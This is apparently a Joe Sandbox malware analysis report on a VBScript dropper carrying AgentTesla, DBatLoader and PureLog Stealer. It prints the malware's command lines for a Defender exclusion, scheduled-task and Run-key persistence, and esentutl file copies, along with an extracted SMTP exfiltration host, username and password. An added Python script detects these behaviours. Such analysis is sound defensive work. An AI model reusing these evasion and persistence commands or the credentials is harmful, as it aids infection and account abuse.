
Windows Analysis Report
IBKB.vbs

Overview

General Information

Sample name: IBKB.vbs
Analysis ID: 1559226
MD5: 7bbca6f64625872be1a4dba80d36fce1
SHA1: a689a21b1b8a556b7e77be10f2e7ddc0dff7d360
SHA256: d61aad06edbdd7500c507a9df016cfbdc6a21731bd707c51d97abebf687c76b6
Tags: vbs, user-lowmal3

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1100 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 53F0663219E6091CECD600C59389711F)
      • cmd.exe (PID: 6968 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5176 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 1560 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 5816 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 6544 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 1532 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 6660 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • apihost.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 1EFEA57D13329E8280EA1889052BFB56)
  • Juqmtmya.PIF (PID: 5640 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 5776 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 5488 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 3920 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 5068 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 2676 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 5540 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • cleanup
Malware family reference (Malpedia)

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Extracted malware configuration (AgentTesla, as reported by the configuration extractor):
{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Yara matches (memory dumps)

Source | Rule | Description | Author
00000013.00000002.2549393142.0000000002A36000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000013.00000002.2572030022.0000000004255000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000009.00000002.2398990353.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000009.00000003.2169212695.000000000091E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
(26 further entries not reproduced here)

Yara matches (unpacked PEs)

Source | Rule | Description | Author
24.2.Native_neworigin.exe.2b1711e.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
24.2.Native_neworigin.exe.5160000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.2.Native_neworigin.exe.401c190.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.2.Native_neworigin.exe.5850000.8.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
9.3.Native_neworigin.exe.91e438.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
(52 further entries not reproduced here)

System Summary (Sigma matches)

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll (note the trailing space in the "Windows " component: a mock trusted directory, which is what the "DLL Search Order Hijackig Via Additional Space in Path" rule keys on)
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\aymtmquJ.pif, NewProcessName: C:\Users\Public\Libraries\aymtmquJ.pif, OriginalFileName: C:\Users\Public\Libraries\aymtmquJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7096, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ProcessId: 5816, ProcessName: aymtmquJ.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", ProcessId: 1100, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\aymtmquJ.pif, NewProcessName: C:\Users\Public\Libraries\aymtmquJ.pif, OriginalFileName: C:\Users\Public\Libraries\aymtmquJ.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 7096, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\aymtmquJ.pif, ProcessId: 5816, ProcessName: aymtmquJ.pif
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6660, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 3176, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49771
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f, ProcessId: 6660, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs", ProcessId: 1100, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 6544, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1532, ProcessName: powershell.exe
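Every Sigma match above keys on one of a few features of the process tree: a WSH script host at the root, esentutl used to copy files, a Defender exclusion, a scheduled task and a Run value pointing into user-writable paths, a file written under a directory component that ends in a space, and SMTP from a process that is not a mail client. The script below is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves: a minimal Python triage pass that applies those checks to constructed Sysmon-style events modelled on the fields quoted in the matches. The event shape, the rule names, the user-writable path pattern and the MAIL_CLIENTS allowlist are assumptions.

```python
"""Host-side triage checks for the execution chain in this report.
Added example: SAMPLE_EVENTS is constructed to mirror the Sysmon-style fields
quoted in the Sigma matches (EventID 1 process create, 3 network connection,
11 file create, 13 registry value set); it is not sandbox output, and the
rule names and the MAIL_CLIENTS allowlist are assumptions."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int
    image: str
    pid: int
    command_line: str = ""
    target_filename: str = ""
    target_object: str = ""
    details: str = ""
    dest_port: int = 0


@dataclass
class Finding:
    rule: str
    pid: int
    evidence: str


SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")
MAIL_CLIENTS = ("outlook.exe", "thunderbird.exe")  # assumed allowlist for port 25/465/587
# Locations an unprivileged user can write to: per-user AppData/Downloads/Desktop and C:\Users\Public
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\users\\public\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_process(ev):
    out, img, cl = [], basename(ev.image), ev.command_line
    low = cl.lower()
    if img in ("wscript.exe", "cscript.exe") and any(e in low for e in SCRIPT_EXT):
        out.append(Finding("wsh_script_execution", ev.pid, cl))
    if img == "esentutl.exe" and all(s in low for s in ("/y", "/d", "/o")):
        # esentutl /y <src> /d <dst> /o copies a file without copy/xcopy ever running
        out.append(Finding("esentutl_lolbin_copy", ev.pid, cl))
    if img == "powershell.exe" and "add-mppreference" in low and "-exclusion" in low:
        out.append(Finding("defender_exclusion_added", ev.pid, cl))
    if img == "schtasks.exe" and "/create" in low:
        m = re.search(r'/tr\s+"([^"]+)"|/tr\s+(\S+)', cl, re.I)
        target = (m.group(1) or m.group(2)) if m else ""
        if USER_WRITABLE.search(target):
            out.append(Finding("schtasks_from_user_writable_path", ev.pid, cl))
    if USER_WRITABLE.search(ev.image) and img.endswith((".pif", ".cmd", ".scr")):
        out.append(Finding("suspicious_extension_from_user_path", ev.pid, ev.image))
    return out


def check_file(ev):
    out, f = [], ev.target_filename
    # A directory component ending in a space ("C:\Windows \SysWOW64") is a mock
    # trusted directory; every component is checked, not only the first one.
    if any(part.endswith(" ") for part in f.split("\\")[:-1]):
        out.append(Finding("trailing_space_in_path", ev.pid, f))
    if "\\start menu\\programs\\startup\\" in f.lower():
        out.append(Finding("startup_folder_write", ev.pid, f))
    return out


def check_registry(ev):
    if "\\currentversion\\run" in ev.target_object.lower() and USER_WRITABLE.search(ev.details):
        return [Finding("run_key_to_user_writable_path", ev.pid, ev.details)]
    return []


def check_network(ev):
    if ev.dest_port in (25, 465, 587) and basename(ev.image) not in MAIL_CLIENTS:
        return [Finding("smtp_from_non_mail_client", ev.pid, f"{ev.image} -> tcp/{ev.dest_port}")]
    return []


HANDLERS = {1: check_process, 3: check_network, 11: check_file, 13: check_registry}


def scan(events):
    out = []
    for ev in events:
        handler = HANDLERS.get(ev.event_id)
        if handler:
            out.extend(handler(ev))
    return out


def rules_fired(events):
    return sorted({f.rule for f in scan(events)})


SAMPLE_EVENTS = [  # constructed, modelled on the Sigma match data in this report
    Event(1, r"C:\Windows\System32\wscript.exe", 1100, command_line=r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"'),
    Event(1, r"C:\Windows\System32\esentutl.exe", 1560, command_line=r"C:\Windows\System32\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\Users\Public\Libraries\Juqmtmya.PIF /o"),
    Event(11, r"C:\Users\user\AppData\Local\Temp\x.exe", 7096, target_filename=r"C:\Windows \SysWOW64\NETUTILS.dll"),
    Event(13, r"C:\Users\user\AppData\Local\Temp\x.exe", 7096, target_object=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya", details=r"C:\Users\Public\Juqmtmya.url"),
    Event(1, r"C:\Users\Public\Libraries\aymtmquJ.pif", 5816, command_line=r"C:\Users\Public\Libraries\aymtmquJ.pif"),
    Event(1, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", 1532, command_line=r"""powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'"""),
    Event(1, r"C:\Windows\SysWOW64\schtasks.exe", 6660, command_line=r'"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f'),
    Event(11, r"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe", 6544, target_filename=r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk"),
    Event(3, r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe", 3176, dest_port=587),
    # benign controls (constructed): a real mail client on 587 and an ordinary file write must stay quiet
    Event(3, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", 4242, dest_port=587),
    Event(11, r"C:\Windows\System32\svchost.exe", 900, target_filename=r"C:\Windows\Temp\log.txt"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:38} pid={f.pid:<5} {f.evidence}")
```

The trailing-space check walks every path component rather than matching only `C:\Windows \`, because the same trick works with any trusted parent directory; the schtasks check extracts the /tr target before testing it so a quoted path with spaces is handled, and the two benign events at the end are there to show the rules do not fire on a normal mail client or a system process writing to a system path.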
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T10:24:34.113260+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 198.252.105.91 | 443 | TCP

2024-11-20T10:24:57.177822+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 52499 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:17.134094+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 63540 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:27.879440+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 60928 | 1.1.1.1 | 53 | UDP

2024-11-20T10:24:53.747785+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 51298 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:15.402425+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 50747 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:26.514301+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 51156 | 1.1.1.1 | 53 | UDP

2024-11-20T10:24:48.209894+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49707 | TCP
2024-11-20T10:24:50.252791+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49708 | TCP
2024-11-20T10:24:54.647482+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49731 | TCP
2024-11-20T10:26:26.064766+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 50011 | TCP
2024-11-20T10:26:32.924764+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 50017 | TCP
2024-11-20T10:26:33.604162+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 50018 | TCP
2024-11-20T10:26:36.015830+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 50020 | TCP
2024-11-20T10:26:38.794559+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50023 | TCP
2024-11-20T10:26:43.938547+0100 | 2018141 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50029 | TCP
2024-11-20T10:27:00.479581+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50043 | TCP
2024-11-20T10:27:01.876394+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 50044 | TCP

2024-11-20T10:24:48.209894+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49707 | TCP
2024-11-20T10:24:50.252791+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49708 | TCP
2024-11-20T10:24:54.647482+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49731 | TCP
2024-11-20T10:26:26.064766+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 50011 | TCP
2024-11-20T10:26:32.924764+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 50017 | TCP
2024-11-20T10:26:33.604162+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 50018 | TCP
2024-11-20T10:26:36.015830+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 50020 | TCP
